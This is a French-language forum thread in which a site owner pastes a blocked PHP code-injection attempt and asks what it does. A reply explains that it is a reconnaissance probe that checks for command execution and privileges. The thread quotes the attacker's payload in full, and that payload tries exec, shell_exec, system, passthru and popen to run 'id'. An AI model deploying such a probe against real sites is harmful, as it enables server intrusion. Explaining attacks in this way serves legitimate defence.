[RESOLU] pb sécurité : injection de code

[cyfou]

Bonsoir,

J'ai besoin d'aide pour comprendre les attaques sur mon site.
J'ai installé Crawltrack : les injections de code sont arrétées.
Ci-après l'injection bloquée :

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
[spam-filter]
return $res;
}
exit;

Pouvez-vous m'expliquer ce que le pirate essaie de faire svp ?

Merci d'avance pour votre aide

De plus, crawltrack précise que certains modules peuvent exposer le site à des malveillances :

Bradabra / CodeWand phpBrowse / FireFly / Framework for Comm / GoSamba / PhP Generic Library / PHPCentral Poll / PhpForums Admin Phorum / PMB

Est-ce que prestashop les utilise ?

a+

[Damien Metzger]

Bonjour,

Ton pirate essaye de récupérer l'ID d'utilisateur de PHP en utilisant toutes les fonctions systèmes possibles.
C'est une première approche pour voir quelle faille existe et quels droits le pirate obtiendra en cas de succès.
En cas de succès et avec un utilisateur root, il pourrait par exemple se mailer le contenu de ton serveur et tout effacer derrière (en gros).

Nous n'utilisons pas les lib pré-citées.

[cyfou]

OK Merci beaucoup pour les infos !

a+